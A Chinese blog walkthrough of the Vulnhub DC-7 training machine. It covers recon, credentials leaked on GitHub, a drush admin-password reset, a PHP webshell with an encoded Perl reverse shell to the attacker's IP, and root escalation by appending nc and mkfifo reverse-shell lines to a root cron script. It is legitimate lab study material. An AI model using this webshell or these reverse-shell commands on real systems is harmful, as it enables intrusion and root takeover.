[Vulnhub] DC-7

于 2023-01-30 17:58:49 发布
阅读量330 收藏
点赞数 1
分类专栏: Vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/128792298
版权

下载链接:https://download.vulnhub.com/dc/DC-7.zip

  • git信息泄露
  • Drupal-CMS 拿shell
  • nc反弹shell
  • 反弹shell写入root用户的cron定时任务,root执行提权

目录

<1> 信息搜集

(1) nmap扫靶机ip&端口服务

(2) github上DC-7项目信息泄露

<2> 反弹shell

(1) ssh登录dc7user

(2)drush命令修改admin密码

<3> Privilege Escalation(写入cron定时任务提权)

<1> 信息搜集

(1) nmap扫靶机ip&端口服务

扫一下靶机的ip

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.137

nmap -A -p 1-65535 192.168.236.137 扫描一下靶机开放哪些服务

 80端口开放了一个 Drupal 8服务,/user/login里有登录框  /user/password是重置密码

Drupal简介:

        Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和
PHP开发框架(Framework)共同组成。
        形象地说,Drupal是一个附带CMS的PHP开发框架

这里根据之前的描述,感觉有点像DC-1靶机了,不过DC-1是Drupal7 

CMS Drupal8 存在(CVE-2018-7600) 

msfconsole 里利用CVE-2018-7600 没成功

(2) github上DC-7项目信息泄露

While this challenge isn't all that technical  不完全是技术性的 跳出一贯暴力破解用户登录的思维

 可以看见左下角有一个 @DC7USER     搜索一下,发现github上有一个repo

 里面泄露了源码,github信息泄露

 同时 在config.php配置文件里,获得了username和password:MdR3xOgB7#dW

	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";

<2> 反弹shell

(1) ssh登录dc7user

/user/login登录不了,试着ssh登录,成功登录

 去home目录搜集一下其他信息,发现说有一个mail

查看一下

From root@dc-7 Mon Jan 30 17:15:14 2023
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Mon, 30 Jan 2023 17:15:14 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1pMONm-0000HT-Rv
	for root@dc-7; Mon, 30 Jan 2023 17:15:14 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1pMONm-0000HT-Rv@dc-7>
Date: Mon, 30 Jan 2023 17:15:14 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Mon Jan 30 17:30:07 2023
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Mon, 30 Jan 2023 17:30:07 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1pMOcB-0000I7-I8
	for root@dc-7; Mon, 30 Jan 2023 17:30:07 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1pMOcB-0000I7-I8@dc-7>
Date: Mon, 30 Jan 2023 17:30:07 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Mon Jan 30 17:45:10 2023
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Mon, 30 Jan 2023 17:45:10 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1pMOqk-0000Ij-42
	for root@dc-7; Mon, 30 Jan 2023 17:45:10 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1pMOqk-0000Ij-42@dc-7>
Date: Mon, 30 Jan 2023 17:45:10 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Mon Jan 30 18:00:11 2023
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Mon, 30 Jan 2023 18:00:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1pMP5H-0000Jc-T2
	for root@dc-7; Mon, 30 Jan 2023 18:00:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1pMP5H-0000Jc-T2@dc-7>
Date: Mon, 30 Jan 2023 18:00:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

应该是一个15分钟的定时任务 Cron

Subject: Cron <root@dc-7> /opt/scripts/backups.sh

查看一下 Subject: Cron <root@dc-7> /opt/scripts/backups.sh 内容

#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz

这是root的定时任务执行的shell脚本文件,我们可以将命令写入这个文件以root执行,从而提权,但是dc7user没有权限执行,,www-data可以。我们去搞一个www-data的shell

(2)drush命令修改admin密码

drush是Drupal shell 专门管理drupal站点的shell

这个命令需要先切换到drupal的目录  /var/www/html

查看用户信息

drush user-information admin,dc7user

修改密码

drush upwd admin --password="****"

 修改admin密码为 123456

回到/user/login后台  登录Drupal站点

找到上传路径Content/Add content/Basic page下,创建PHP代码反弹shell,但发现只有html解析器,没有php解析器。我们去extend那一栏 install

PHP解释器Drupal官方连接

https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

下载成功后在extend中启动php filter

 再回到Content去写入webshell的php代码

<?php
function which($pr) {

    $path = execute("which $pr");

    return ($path ? $path : $pr);

}

function execute($cfe) {

    $res = '';

    if ($cfe) {

        if(function_exists('exec')) {

            @exec($cfe,$res);

            $res = join("\n",$res);

        } elseif(function_exists('shell_exec')) {

            $res = @shell_exec($cfe);

        } elseif(function_exists('system')) {

            @ob_start();

            @system($cfe);

            $res = @ob_get_contents();

            @ob_end_clean();

        } elseif(function_exists('passthru')) {

            @ob_start();

            @passthru($cfe);

            $res = @ob_get_contents();

            @ob_end_clean();

        } elseif(@is_resource($f = @popen($cfe,"r"))) {

            $res = '';

            while(!@feof($f)) {

                $res .= @fread($f,1024);

            }

            @pclose($f);

        }

    }

    return $res;

}

function cf($fname,$text){

    if($fp=@fopen($fname,'w')) {

        @fputs($fp,@base64_decode($text));

        @fclose($fp);

    }

}

$yourip = "192.168.236.128"; #注意这里是kali的ip

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

    "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

    "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

    "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

    "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

    "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

    "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

 拿到shell,转为交互式

python -c 'import pty;pty.spawn("/bin/bash")'

<3> Privilege Escalation(写入cron定时任务提权)

 拿到www-data的shell之后,利用root的定时任务进行提权

我们可以往 backups.sh 里写入反弹shell的命令

方法1
echo "nc 192.168.236.128 -e /bin/bash 1234" >> backups.sh
nc -lvvp 1234
 
方法2
#有些操作系统的netcat不支持-e参数,这时候可以利用管道符命令mkfifo配合nc进行反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.236.128 1234 >/tmp/f" >> backups.sh
nc -lvvp 1234

成功写入:

kali开启监听 nc -lvvp 1234 等待root的每十五分钟定时任务去执行 /opt/scripts/backups.sh  即可获得root的shell

python -c 'import pty;pty.spawn("/bin/bash");'   转化为交互式

ps:十五分钟挺长的,,第一次写入好像出了点问题 invalid port /bin/bash  又等了十五分钟

葫芦娃42
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机:DC-7渗透详细过程
IerkeU的博客
03-20 1045
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备中级的渗透测试技巧,这并不是一个很有技术性的挑战,但也不能算容易。渗透测试的和之前的 DC 靶机(哪一台就不知道了)有相似的地方,但会涉及到一些新东西,你的最终目标是放在roo
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub-DC-7
KAKA的博客
07-04 394
此次的训练以 Drupal 为主题,并且思考方式不再是单纯的在盒子里,而是要跳出去… 扫描整获取目标 IP :nmap -sn 192.168.67.0/24 扫描目标获取相应信息:nmap -A -p- 192.168.67.242 --> 22 | 80 22 SSH 服务 || 80 HTTP 服务,猜测后面极有可能要用到 SSH 服务…查阅 http://192.168.67.242,CMS 是 Drupal,版本为 8,没有找到关于该版本的相关漏洞利用 初步浏览页面,说是引入了新的概念,需要
VulnHub DC7
baynk的博客
05-21 324
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-7,356/ 下载地址2:https://pan.baidu.com/s/1xua7BTO8If5zLua8dQMryA 提取码: dd83 只有一个flag,同时给了提示,不要去使用暴力破解。 这次地址都给了,真好,开肝。 0x02 渗透流程 nmap走起 还是先走80端口 熟悉的界面,好像是dc1使用的Drupal CMS,翻出第一关的页面进行对比 常规思路测试了好一会不一样的地方,逻辑漏洞,搜
Vulnhub DC-7
Pai_Space
03-26 5278
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
vulnhub-dc7
bqnagus
09-30 94
vulnhub-dc7靶机复现
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
vulnhub靶场实战系列-DC-1实战流程图
05-17
VulnHubDC-7
weixin_39219503的博客
02-02 410
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-7,356/ 题目信息如下 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. W...
vulnhubdc7
qq_54030686的博客
06-16 176
这个靶场本身的难度还可以,主要是它会一直提示你,这种查找源码泄露的方法,在实际中测试中有可能会用到 描述一下整体思路话不多说,操作 主机发现,端口扫描 22端口爆破,未发现弱口令 指纹识别,发现目标为Drupal 8框架 尝试 exploit-db和msf漏洞利用 ![在这里插入图片描述](https://img-blog.csdnimg.cn/3ae9 msf中自带的还是exploit-db上存在的,个人都进行尝试,利用失败 查看界面下方,存在所属厂商 github查找相应资源 在文件的config配置
Vulnhub系列--DC7
qq_33775686的博客
05-31 371
知识点: netdiscover nmap droopescan PHP Filter 反弹shell (bin shell 、MSF shell) 提权
vulnhubDC7靶机
LainWith的博客
02-14 1464
目录介绍信息收集主机发现主机信息探测访问网站SSH登录信息收集修改web后台密码挂马提权 介绍 系列: DC(此系列共10台) 发布日期:2019年8月31日 难度:中级 Flag:获取root权限,并拿到唯一的flag 学习: drupal安装php实现挂马 提权 靶机地址:https://www.vulnhub.com/entry/dc-7,356/ 从靶场得到提示信息: 靶机更适用Virtualbox 不要尝试爆破,很难成功 信息收集 主机发现 netdiscover主机发现 对于VulnHu
dc-dc仿真电路 multisim
10-31
DC-DC仿真电路在Multisim软件中是一种用于模拟和调试DC-DC转换器的工具。它可以帮助工程师在设计和优化DC-DC转换器时进行电路仿真和性能分析。 首先,我们可以在Multisim中选择合适的电路元件来构建DC-DC转换器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值